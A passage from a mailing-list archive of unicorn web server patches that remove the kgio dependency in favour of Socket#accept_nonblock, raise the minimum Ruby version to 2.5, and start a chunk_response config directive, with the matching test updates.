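  :wait_readable or a [ Socket, Addrinfo ] pair, so REMOTE_ADDR can be
  filled in without a getpeername(2) syscall.

    require 'socket'

    srv = Socket.new(:INET, :STREAM)
    srv.bind(Socket.pack_sockaddr_in(0, '127.0.0.1'))
    srv.listen(1024)

    case res = srv.accept_nonblock(exception: false)
    when :wait_readable
      # nothing to accept yet; go back to waiting on the listener
    else
      io, ai = res
      remote_addr = ai.unix? ? '127.0.0.1' : ai.ip_address
      # hand io + remote_addr off to request processing here
    end
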
 lib/unicorn.rb                  |  3 +-
 lib/unicorn/http_request.rb     | 14 +++----
 lib/unicorn/http_server.rb      | 30 +++++---------
 lib/unicorn/oob_gc.rb           |  4 +-
 lib/unicorn/socket_helper.rb    | 50 +++--------------------
 lib/unicorn/worker.rb           |  6 +--
 t/oob_gc.ru                     |  3 --
 t/oob_gc_path.ru                |  3 --
 test/unit/test_request.rb       | 47 ++++++++-------------
 test/unit/test_socket_helper.rb | 72 +++++++--------------------------
 test/unit/test_stream_input.rb  |  2 +-
 test/unit/test_tee_input.rb     |  2 +-
 unicorn.gemspec                 |  1 -
 13 files changed, 61 insertions(+), 176 deletions(-)

diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index b817b77..564cb30 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,7 +1,6 @@
 # -*- encoding: binary -*-
 require 'etc'
 require 'stringio'
-require 'kgio'
 require 'raindrops'
 require 'io/wait'
 
@@ -112,7 +111,7 @@ def self.log_error(logger, prefix, exc)
   F_SETPIPE_SZ = 1031 if RUBY_PLATFORM =~ /linux/
 
   def self.pipe # :nodoc:
-    Kgio::Pipe.new.each do |io|
+    IO.pipe.each do |io|
       # shrink pipes to minimize impact on /proc/sys/fs/pipe-user-pages-soft
       # limits.
       if defined?(F_SETPIPE_SZ)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 8bca60a..ab3bd6e 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -61,7 +61,7 @@ def self.check_client_connection=(bool)
   # returns an environment hash suitable for Rack if successful
   # This does minimal exception trapping and it is up to the caller
   # to handle any socket errors (e.g. user aborted upload).
-  def read(socket)
+  def read_headers(socket, ai)
     e = env
 
     # From https://www.ietf.org/rfc/rfc3875:
@@ -71,7 +71,7 @@ def read(socket)
     #  identify the client for the immediate request to the server;
     #  that client may be a proxy, gateway, or other intermediary
     #  acting on behalf of the actual source client."
-    e['REMOTE_ADDR'] = socket.kgio_addr
+    e['REMOTE_ADDR'] = ai.unix? ? '127.0.0.1' : ai.ip_address
 
     # short circuit the common case with small GET requests first
     socket.readpartial(16384, buf)
@@ -81,7 +81,7 @@ def read(socket)
       false until add_parse(socket.readpartial(16384))
     end
 
-    check_client_connection(socket) if @@check_client_connection
+    check_client_connection(socket, ai) if @@check_client_connection
 
     e['rack.input'] = 0 == content_length ?
                       NULL_IO : @@input_class.new(socket, self)
@@ -107,8 +107,8 @@ def hijacked?
   if Raindrops.const_defined?(:TCP_Info)
     TCPI = Raindrops::TCP_Info.allocate
 
-    def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket
+    def check_client_connection(socket, ai) # :nodoc:
+      if ai.ip?
         # Raindrops::TCP_Info#get!, #state (reads struct tcp_info#tcpi_state)
         raise Errno::EPIPE, "client closed connection".freeze,
               EMPTY_ARRAY if closed_state?(TCPI.get!(socket).state)
@@ -152,8 +152,8 @@ def closed_state?(state) # :nodoc:
     # Ruby 2.2+ can show struct tcp_info as a string Socket::Option#inspect.
     # Not that efficient, but probably still better than doing unnecessary
     # work after a client gives up.
-    def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok
+    def check_client_connection(socket, ai) # :nodoc:
+      if @@tcpi_inspect_ok && ai.ip?
         opt = socket.getsockopt(Socket::IPPROTO_TCP, Socket::TCP_INFO).inspect
         if opt =~ /\bstate=(\S+)/
           raise Errno::EPIPE, "client closed connection".freeze,
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 2f1eb1b..ed5bbf1 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -111,9 +111,7 @@ def initialize(app, options = {})
 
     @worker_data = if worker_data = ENV['UNICORN_WORKER']
       worker_data = worker_data.split(',').map!(&:to_i)
-      worker_data[1] = worker_data.slice!(1..2).map do |i|
-        Kgio::Pipe.for_fd(i)
-      end
+      worker_data[1] = worker_data.slice!(1..2).map { |i| IO.for_fd(i) }
       worker_data
     end
   end
@@ -243,10 +241,6 @@ def listen(address, opt = {}.merge(listener_opts[address] || {}))
     tries = opt[:tries] || 5
     begin
       io = bind_listen(address, opt)
-      unless Kgio::TCPServer === io || Kgio::UNIXServer === io
-        io.autoclose = false
-        io = server_cast(io)
-      end
       logger.info "listening on addr=#{sock_name(io)} fd=#{io.fileno}"
       LISTENERS << io
       io
@@ -594,9 +588,9 @@ def e100_response_write(client, env)
 
   # once a client is accepted, it is processed in its entirety here
   # in 3 easy steps: read request, call app, write app response
-  def process_client(client)
+  def process_client(client, ai)
     @request = Unicorn::HttpRequest.new
-    env = @request.read(client)
+    env = @request.read_headers(client, ai)
 
     if early_hints
       env["rack.early_hints"] = lambda do |headers|
@@ -708,10 +702,9 @@ def worker_loop(worker)
       reopen = reopen_worker_logs(worker.nr) if reopen
       worker.tick = time_now.to_i
       while sock = ready.shift
-        # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
-        # but that will return false
-        if client = sock.kgio_tryaccept
-          process_client(client)
+        client_ai = sock.accept_nonblock(exception: false)
+        if client_ai != :wait_readable
+          process_client(*client_ai)
           worker.tick = time_now.to_i
         end
         break if reopen
@@ -809,7 +802,6 @@ def redirect_io(io, path)
 
   def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
-    # before they become Kgio::UNIXServer or Kgio::TCPServer
     inherited = ENV['UNICORN_FD'].to_s.split(',')
     immortal = []
 
@@ -825,8 +817,6 @@ def inherit_listeners!
     inherited.map! do |fd|
       io = Socket.for_fd(fd.to_i)
       @immortal << io if immortal.include?(fd)
-      io.autoclose = false
-      io = server_cast(io)
       set_server_sockopt(io, listener_opts[sock_name(io)])
       logger.info "inherited addr=#{sock_name(io)} fd=#{io.fileno}"
       io
@@ -835,11 +825,9 @@ def inherit_listeners!
     config_listeners = config[:listeners].dup
     LISTENERS.replace(inherited)
 
-    # we start out with generic Socket objects that get cast to either
-    # Kgio::TCPServer or Kgio::UNIXServer objects; but since the Socket
-    # objects share the same OS-level file descriptor as the higher-level
-    # *Server objects; we need to prevent Socket objects from being
-    # garbage-collected
+    # we only use generic Socket objects for aggregate Socket#accept_nonblock
+    # return value [ Socket, Addrinfo ].  This allows us to avoid having to
+    # make getpeername(2) syscalls later on to fill in env['REMOTE_ADDR']
     config_listeners -= listener_names
     if config_listeners.empty? && LISTENERS.empty?
       config_listeners << Unicorn::Const::DEFAULT_LISTEN
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index 91a8e51..db9f2cb 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -65,8 +65,8 @@ def self.new(app, interval = 5, path = %r{\A/})
   end
 
   #:stopdoc:
-  def process_client(client)
-    super(client) # Unicorn::HttpServer#process_client
+  def process_client(*args)
+    super(*args) # Unicorn::HttpServer#process_client
     env = instance_variable_get(:@request).env
     if OOBGC_PATH =~ env['PATH_INFO'] && ((@@nr -= 1) <= 0)
       @@nr = OOBGC_INTERVAL
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index c2ba75e..06ec2b2 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -3,32 +3,6 @@
 require 'socket'
 
 module Unicorn
-
-  # Instead of using a generic Kgio::Socket for everything,
-  # tag TCP sockets so we can use TCP_INFO under Linux without
-  # incurring extra syscalls for Unix domain sockets.
-  # TODO: remove these when we remove kgio
-  TCPClient = Class.new(Kgio::Socket) # :nodoc:
-  class TCPSrv < Kgio::TCPServer # :nodoc:
-    def kgio_tryaccept # :nodoc:
-      super(TCPClient)
-    end
-  end
-
-  if IO.instance_method(:write).arity == 1 # Ruby <= 2.4
-    require 'unicorn/write_splat'
-    UNIXClient = Class.new(Kgio::Socket) # :nodoc:
-    class UNIXSrv < Kgio::UNIXServer # :nodoc:
-      include Unicorn::WriteSplat
-      def kgio_tryaccept # :nodoc:
-        super(UNIXClient)
-      end
-    end
-    TCPClient.__send__(:include, Unicorn::WriteSplat)
-  else # Ruby 2.5+
-    UNIXSrv = Kgio::UNIXServer
-  end
-
   module SocketHelper
 
     # internal interface
@@ -105,7 +79,7 @@ def set_tcp_sockopt(sock, opt)
     def set_server_sockopt(sock, opt)
       opt = DEFAULTS.merge(opt || {})
 
-      TCPSocket === sock and set_tcp_sockopt(sock, opt)
+      set_tcp_sockopt(sock, opt) if sock.local_address.ip?
 
       rcvbuf, sndbuf = opt.values_at(:rcvbuf, :sndbuf)
       if rcvbuf || sndbuf
@@ -149,7 +123,9 @@ def bind_listen(address = '0.0.0.0:8080', opt = {})
         end
         old_umask = File.umask(opt[:umask] || 0)
         begin
-          UNIXSrv.new(address)
+          s = Socket.new(:UNIX, :STREAM)
+          s.bind(Socket.sockaddr_un(address))
+          s
         ensure
           File.umask(old_umask)
         end
@@ -177,8 +153,7 @@ def new_tcp_server(addr, port, opt)
         sock.setsockopt(:SOL_SOCKET, :SO_REUSEPORT, 1)
       end
       sock.bind(Socket.pack_sockaddr_in(port, addr))
-      sock.autoclose = false
-      TCPSrv.for_fd(sock.fileno)
+      sock
     end
 
     # returns rfc2732-style (e.g. "[::1]:666") addresses for IPv6
@@ -194,10 +169,6 @@ def tcp_name(sock)
     def sock_name(sock)
       case sock
       when String then sock
-      when UNIXServer
-        Socket.unpack_sockaddr_un(sock.getsockname)
-      when TCPServer
-        tcp_name(sock)
       when Socket
         begin
           tcp_name(sock)
@@ -210,16 +181,5 @@ def sock_name(sock)
     end
 
     module_function :sock_name
-
-    # casts a given Socket to be a TCPServer or UNIXServer
-    def server_cast(sock)
-      begin
-        Socket.unpack_sockaddr_in(sock.getsockname)
-        TCPSrv.for_fd(sock.fileno)
-      rescue ArgumentError
-        UNIXSrv.for_fd(sock.fileno)
-      end
-    end
-
   end # module SocketHelper
 end # module Unicorn
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index ad5814c..4af31be 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -71,8 +71,8 @@ def soft_kill(sig) # :nodoc:
   end
 
   # this only runs when the Rack app.call is not running
-  # act like a listener
-  def kgio_tryaccept # :nodoc:
+  # act like Socket#accept_nonblock(exception: false)
+  def accept_nonblock(*_unused) # :nodoc:
     case buf = @to_io.read_nonblock(4, exception: false)
     when String
       # unpack the buffer and trigger the signal handler
@@ -82,7 +82,7 @@ def kgio_tryaccept # :nodoc:
     when nil # EOF: master died, but we are at a safe place to exit
       fake_sig(:QUIT)
     when :wait_readable # keep waiting
-      return false
+      return :wait_readable
     end while true # loop, as multiple signals may be sent
   end
 
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index c253540..224cb06 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -7,9 +7,6 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
-    x.closed? or abort "not closed #{x}"
-  end
   $gc_started = true
 end
 run lambda { |env|
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index af8e3b9..7f40601 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -7,9 +7,6 @@
 
 # Mock GC.start
 def GC.start
-  ObjectSpace.each_object(Kgio::Socket) do |x|
-    x.closed? or abort "not closed #{x}"
-  end
   $gc_started = true
 end
 run lambda { |env|
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 7f22b24..53ae944 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -10,14 +10,9 @@
 
 class RequestTest < Test::Unit::TestCase
 
-  class MockRequest < StringIO
-    alias_method :readpartial, :sysread
-    alias_method :kgio_read!, :sysread
-    alias_method :read_nonblock, :sysread
-    def kgio_addr
-      '127.0.0.1'
-    end
-  end
+  MockRequest = Class.new(StringIO)
+
+  AI = Addrinfo.new(Socket.sockaddr_un('/unicorn/sucks'))
 
   def setup
     @request = HttpRequest.new
@@ -30,7 +25,7 @@ def setup
   def test_options
     client = MockRequest.new("OPTIONS * HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '', env['REQUEST_PATH']
     assert_equal '', env['PATH_INFO']
     assert_equal '*', env['REQUEST_URI']
@@ -40,7 +35,7 @@ def test_options
   def test_absolute_uri_with_query
     client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'y=z', env['QUERY_STRING']
@@ -50,7 +45,7 @@ def test_absolute_uri_with_query
   def test_absolute_uri_with_fragment
     client = MockRequest.new("GET http://e:3/x#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal '', env['QUERY_STRING']
@@ -61,7 +56,7 @@ def test_absolute_uri_with_fragment
   def test_absolute_uri_with_query_and_fragment
     client = MockRequest.new("GET http://e:3/x?a=b#frag HTTP/1.1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal '/x', env['REQUEST_PATH']
     assert_equal '/x', env['PATH_INFO']
     assert_equal 'a=b', env['QUERY_STRING']
@@ -73,7 +68,7 @@ def test_absolute_uri_unsupported_schemes
     %w(ssh+http://e/ ftp://e/x http+ssh://e/x).each do |abs_uri|
       client = MockRequest.new("GET #{abs_uri} HTTP/1.1\r\n" \
                                "Host: foo\r\n\r\n")
-      assert_raises(HttpParserError) { @request.read(client) }
+      assert_raises(HttpParserError) { @request.read_headers(client, AI) }
     end
   end
 
@@ -81,7 +76,7 @@ def test_x_forwarded_proto_https
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: https\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "https", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
@@ -90,7 +85,7 @@ def test_x_forwarded_proto_http
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: http\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
@@ -99,14 +94,14 @@ def test_x_forwarded_proto_invalid
     client = MockRequest.new("GET / HTTP/1.1\r\n" \
                              "X-Forwarded-Proto: ftp\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_kind_of Array, @lint.call(env)
   end
 
   def test_rack_lint_get
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal "http", env['rack.url_scheme']
     assert_equal '127.0.0.1', env['REMOTE_ADDR']
     assert_kind_of Array, @lint.call(env)
@@ -114,7 +109,7 @@ def test_rack_lint_get
 
   def test_no_content_stringio
     client = MockRequest.new("GET / HTTP/1.1\r\nHost: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal StringIO, env['rack.input'].class
   end
 
@@ -122,7 +117,7 @@ def test_zero_content_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 0\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal StringIO, env['rack.input'].class
   end
 
@@ -130,7 +125,7 @@ def test_real_content_not_stringio
     client = MockRequest.new("PUT / HTTP/1.1\r\n" \
                              "Content-Length: 1\r\n" \
                              "Host: foo\r\n\r\n")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert_equal Unicorn::TeeInput, env['rack.input'].class
   end
 
@@ -141,7 +136,7 @@ def test_rack_lint_put
       "Content-Length: 5\r\n" \
       "\r\n" \
       "abcde")
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert ! env.include?(:http_body)
     assert_kind_of Array, @lint.call(env)
   end
@@ -152,14 +147,6 @@ def test_rack_lint_big_put
     buf = (' ' * bs).freeze
     length = bs * count
     client = Tempfile.new('big_put')
-    def client.kgio_addr; '127.0.0.1'; end
-    def client.kgio_read(*args)
-      readpartial(*args)
-    rescue EOFError
-    end
-    def client.kgio_read!(*args)
-      readpartial(*args)
-    end
     client.syswrite(
       "PUT / HTTP/1.1\r\n" \
       "Host: foo\r\n" \
@@ -167,7 +154,7 @@ def client.kgio_read!(*args)
       "\r\n")
     count.times { assert_equal bs, client.syswrite(buf) }
     assert_equal 0, client.sysseek(0)
-    env = @request.read(client)
+    env = @request.read_headers(client, AI)
     assert ! env.include?(:http_body)
     assert_equal length, env['rack.input'].size
     count.times {
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index 62d5a3a..a446f06 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -24,7 +24,8 @@ def test_bind_listen_tcp
     port = unused_port @test_addr
     @tcp_listener_name = "#@test_addr:#{port}"
     @tcp_listener = bind_listen(@tcp_listener_name)
-    assert TCPServer === @tcp_listener
+    assert Socket === @tcp_listener
+    assert @tcp_listener.local_address.ip?
     assert_equal @tcp_listener_name, sock_name(@tcp_listener)
   end
 
@@ -38,10 +39,10 @@ def test_bind_listen_options
       { :backlog => 16, :rcvbuf => 4096, :sndbuf => 4096 }
     ].each do |opts|
       tcp_listener = bind_listen(tcp_listener_name, opts)
-      assert TCPServer === tcp_listener
+      assert tcp_listener.local_address.ip?
       tcp_listener.close
       unix_listener = bind_listen(unix_listener_name, opts)
-      assert UNIXServer === unix_listener
+      assert unix_listener.local_address.unix?
       unix_listener.close
     end
   end
@@ -52,11 +53,13 @@ def test_bind_listen_unix
     @unix_listener_path = tmp.path
     File.unlink(@unix_listener_path)
     @unix_listener = bind_listen(@unix_listener_path)
-    assert UNIXServer === @unix_listener
+    assert Socket === @unix_listener
+    assert @unix_listener.local_address.unix?
     assert_equal @unix_listener_path, sock_name(@unix_listener)
     assert File.readable?(@unix_listener_path), "not readable"
     assert File.writable?(@unix_listener_path), "not writable"
     assert_equal 0777, File.umask
+    assert_equal @unix_listener, bind_listen(@unix_listener)
   ensure
     File.umask(old_umask)
   end
@@ -67,7 +70,6 @@ def test_bind_listen_unix_umask
     @unix_listener_path = tmp.path
     File.unlink(@unix_listener_path)
     @unix_listener = bind_listen(@unix_listener_path, :umask => 077)
-    assert UNIXServer === @unix_listener
     assert_equal @unix_listener_path, sock_name(@unix_listener)
     assert_equal 0140700, File.stat(@unix_listener_path).mode
     assert_equal 0777, File.umask
@@ -75,28 +77,6 @@ def test_bind_listen_unix_umask
     File.umask(old_umask)
   end
 
-  def test_bind_listen_unix_idempotent
-    test_bind_listen_unix
-    a = bind_listen(@unix_listener)
-    assert_equal a.fileno, @unix_listener.fileno
-    unix_server = server_cast(@unix_listener)
-    assert UNIXServer === unix_server
-    a = bind_listen(unix_server)
-    assert_equal a.fileno, unix_server.fileno
-    assert_equal a.fileno, @unix_listener.fileno
-  end
-
-  def test_bind_listen_tcp_idempotent
-    test_bind_listen_tcp
-    a = bind_listen(@tcp_listener)
-    assert_equal a.fileno, @tcp_listener.fileno
-    tcp_server = server_cast(@tcp_listener)
-    assert TCPServer === tcp_server
-    a = bind_listen(tcp_server)
-    assert_equal a.fileno, tcp_server.fileno
-    assert_equal a.fileno, @tcp_listener.fileno
-  end
-
   def test_bind_listen_unix_rebind
     test_bind_listen_unix
     new_listener = nil
@@ -107,14 +87,18 @@ def test_bind_listen_unix_rebind
     File.unlink(@unix_listener_path)
     new_listener = bind_listen(@unix_listener_path)
 
-    assert UNIXServer === new_listener
     assert new_listener.fileno != @unix_listener.fileno
     assert_equal sock_name(new_listener), sock_name(@unix_listener)
     assert_equal @unix_listener_path, sock_name(new_listener)
     pid = fork do
-      client = server_cast(new_listener).accept
-      client.syswrite('abcde')
-      exit 0
+      begin
+        client, _ = new_listener.accept
+        client.syswrite('abcde')
+        exit 0
+      rescue => e
+        warn "#{e.message} (#{e.class})"
+        exit 1
+      end
     end
     s = unix_socket(@unix_listener_path)
     IO.select([s])
@@ -123,32 +107,6 @@ def test_bind_listen_unix_rebind
     assert status.success?
   end
 
-  def test_server_cast
-    test_bind_listen_unix
-    test_bind_listen_tcp
-    unix_listener_socket = Socket.for_fd(@unix_listener.fileno)
-    assert Socket === unix_listener_socket
-    @unix_server = server_cast(unix_listener_socket)
-    assert_equal @unix_listener.fileno, @unix_server.fileno
-    assert UNIXServer === @unix_server
-    assert_equal(@unix_server.path, @unix_listener.path,
-                 "##{@unix_server.path} != #{@unix_listener.path}")
-    assert File.socket?(@unix_server.path)
-    assert_equal @unix_listener_path, sock_name(@unix_server)
-
-    tcp_listener_socket = Socket.for_fd(@tcp_listener.fileno)
-    assert Socket === tcp_listener_socket
-    @tcp_server = server_cast(tcp_listener_socket)
-    assert_equal @tcp_listener.fileno, @tcp_server.fileno
-    assert TCPServer === @tcp_server
-    assert_equal @tcp_listener_name, sock_name(@tcp_server)
-  end
-
-  def test_sock_name
-    test_server_cast
-    sock_name(@unix_server)
-  end
-
   def test_tcp_defer_accept_default
     return unless defined?(TCP_DEFER_ACCEPT)
     port = unused_port @test_addr
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 2a14135..7986ca7 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -9,7 +9,7 @@ def setup
     @rs = "\n"
     $/ == "\n" or abort %q{test broken if \$/ != "\\n"}
     @env = {}
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
   end
diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 6f5bc8a..607ce87 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -10,7 +10,7 @@ class TeeInput < Unicorn::TeeInput
 
 class TestTeeInput < Test::Unit::TestCase
   def setup
-    @rd, @wr = Kgio::UNIXSocket.pair
+    @rd, @wr = UNIXSocket.pair
     @rd.sync = @wr.sync = true
     @start_pid = $$
     @rs = "\n"
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 7bb1154..85183d9 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -36,7 +36,6 @@
   # won't have descriptive text, only the numeric status.
   s.add_development_dependency(%q<rack>)
 
-  s.add_dependency(%q<kgio>, '~> 2.6')
   s.add_dependency(%q<raindrops>, '~> 0.7')
 
   s.add_development_dependency('test-unit', '~> 3.0')

[-- Attachment #4: 0003-update-dependency-to-Ruby-2.5.patch --]
[-- Type: text/x-diff, Size: 3257 bytes --]

From c67ebf96edc8ca691dfc556d4813fed242fe77ca Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Tue, 5 Sep 2023 09:14:11 +0000
Subject: [RFC 3/3] update dependency to Ruby 2.5+

We actually need Ruby 2.3+ for `accept_nonblock(exception: false)';
and (AFAIK) we can't easily use a subclass of `Socket' while using
Socket#accept_nonblock to inject WriteSplat support for
`IO#write(*multi_args)'

So just depend on Ruby 2.5+ since all my Ruby installs are on the
already-ancient Ruby 2.7+ anyways.
---
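  For illustration only (not from the patch): Ruby 2.5 is where
  IO#write started accepting multiple arguments, which is exactly what
  lib/unicorn/write_splat.rb shimmed on older Rubies.

    rd, wr = IO.pipe
    # single call instead of joining strings first; on Ruby <= 2.4
    # this raised ArgumentError without the WriteSplat shim
    wr.write("HTTP/1.1 200 OK\r\n", "content-length: 2\r\n", "\r\n", "hi")
    wr.close
    rd.read # => "HTTP/1.1 200 OK\r\ncontent-length: 2\r\n\r\nhi"
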
 HACKING                    | 2 +-
 README                     | 2 +-
 lib/unicorn/write_splat.rb | 7 -------
 t/README                   | 2 +-
 unicorn.gemspec            | 4 ++--
 5 files changed, 5 insertions(+), 12 deletions(-)
 delete mode 100644 lib/unicorn/write_splat.rb

diff --git a/HACKING b/HACKING
index 020209e..5aca83e 100644
--- a/HACKING
+++ b/HACKING
@@ -60,7 +60,7 @@ becomes unavailable.
 
 === Ruby/C Compatibility
 
-We target C Ruby 2.0 and later.  We need the Ruby
+We target C Ruby 2.5 and later.  We need the Ruby
 implementation to support fork, exec, pipe, UNIX signals, access to
 integer file descriptors and ability to use unlinked files.
 
diff --git a/README b/README
index 5411003..7e29daf 100644
--- a/README
+++ b/README
@@ -12,7 +12,7 @@ both the the request and response in between unicorn and slow clients.
   cut out everything that is better supported by the operating system,
   {nginx}[https://nginx.org/] or {Rack}[https://rack.github.io/].
 
-* Compatible with Ruby 2.0.0 and later.
+* Compatible with Ruby 2.5 and later.
 
 * Process management: unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
diff --git a/lib/unicorn/write_splat.rb b/lib/unicorn/write_splat.rb
deleted file mode 100644
index 7e6e363..0000000
--- a/lib/unicorn/write_splat.rb
+++ /dev/null
@@ -1,7 +0,0 @@
-# -*- encoding: binary -*-
-# compatibility module for Ruby <= 2.4, remove when we go Ruby 2.5+
-module Unicorn::WriteSplat # :nodoc:
-  def write(*arg) # :nodoc:
-    super(arg.join(''))
-  end
-end
diff --git a/t/README b/t/README
index d09c715..7bd093d 100644
--- a/t/README
+++ b/t/README
@@ -14,7 +14,7 @@ Old tests are in Bourne shell and slowly being ported to Perl 5.
 
 == Requirements
 
-* {Ruby 2.0.0+}[https://www.ruby-lang.org/en/]
+* {Ruby 2.5.0+}[https://www.ruby-lang.org/en/]
 * {Perl 5.14+}[https://www.perl.org/] # your distro should have it
 * {GNU make}[https://www.gnu.org/software/make/]
 * {curl}[https://curl.haxx.se/]
diff --git a/unicorn.gemspec b/unicorn.gemspec
index 85183d9..e7e3ef7 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -25,11 +25,11 @@
   s.homepage = 'https://yhbt.net/unicorn/'
   s.test_files = test_files
 
-  # 2.0.0 is the minimum supported version. We don't specify
+  # 2.5.0 is the minimum supported version. We don't specify
   # a maximum version to make it easier to test pre-releases,
   # but we do warn users if they install unicorn on an untested
   # version in extconf.rb
-  s.required_ruby_version = ">= 2.0.0"
+  s.required_ruby_version = ">= 2.5.0"
 
   # We do not have a hard dependency on rack, it's possible to load
   # things which respond to #call.  HTTP status lines in responses

^ permalink raw reply related	[relevance 2%]

* [PATCH] add chunk_response config directive for compatibility
@ 2023-06-20 12:28  1% EW
  0 siblings, 0 replies; 200+ results
From: EW @ 2023-06-20 12:28 UTC (permalink / raw)
  To: unicorn-public

Since Rack::Chunked is gone in Rack 3.1+ and no longer loaded by
default, we've learned to chunk HTTP/1.1 responses w/o
Content-Length to allow clients to detect truncated responses.

Unfortunately, there exist broken HTTP clients which advertise
"HTTP/1.1" in the request but cannot parse chunked responses.
Thus, we must continue to send unchunked responses as we have in
prior releases if that's what clients expect.  That is, chunked
responses are opt-in unless RACK_ENV is "deployment" or
"development".

It doesn't matter if clients are in the wrong: they've worked
this way for 14 years and we must do everything in our power to
avoid breaking existing expectations on upgrades.

I hate adding config directives, but breaking changes are even
worse since users upgrading unicorn often have no easy way to
to fix broken clients even if they're on the same LAN.
---
  Of course, if users upgrading to unicorn could fix everything,
  they wouldn't need unicorn at all :P
  unicorn was created to support broken code and now exists to
  perpetuate broken code into eternity.
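
  A hypothetical config snippet (assuming this patch is applied)
  showing how a deployment with broken HTTP/1.1 clients would opt out
  of chunked responses:

    # unicorn.conf.rb
    worker_processes 4
    listen "/tmp/unicorn.sock"
    # added by this patch; default depends on RACK_ENV and
    # default_middleware
    chunk_response false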

 Documentation/unicorn.1      |  1 +
 lib/unicorn.rb               |  2 +
 lib/unicorn/configurator.rb  | 17 ++++++-
 lib/unicorn/http_response.rb |  2 +-
 lib/unicorn/http_server.rb   |  3 +-
 t/integration.ru             |  7 +++
 t/integration.t              | 88 +++++++++++++++++++++++++++++++++---
 7 files changed, 110 insertions(+), 10 deletions(-)

diff --git a/Documentation/unicorn.1 b/Documentation/unicorn.1
index b2c5e70..502f44a 100644
--- a/Documentation/unicorn.1
+++ b/Documentation/unicorn.1
@@ -69,6 +69,7 @@ options.
 Disables loading middleware implied by RACK_ENV.  This bypasses the
 configuration documented in the RACK ENVIRONMENT section, but still
 allows RACK_ENV to be used for application/framework\-specific purposes.
+This also affects the "chunk_response" config file directive in unicorn 7.0+
 .RS
 .RE
 .SH RACKUP COMPATIBILITY OPTIONS
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index b817b77..e7b2806 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -78,7 +78,9 @@ def self.builder(ru, op)
       # middlewares will need ContentLength middleware.
       case ENV["RACK_ENV"]
       when "development"
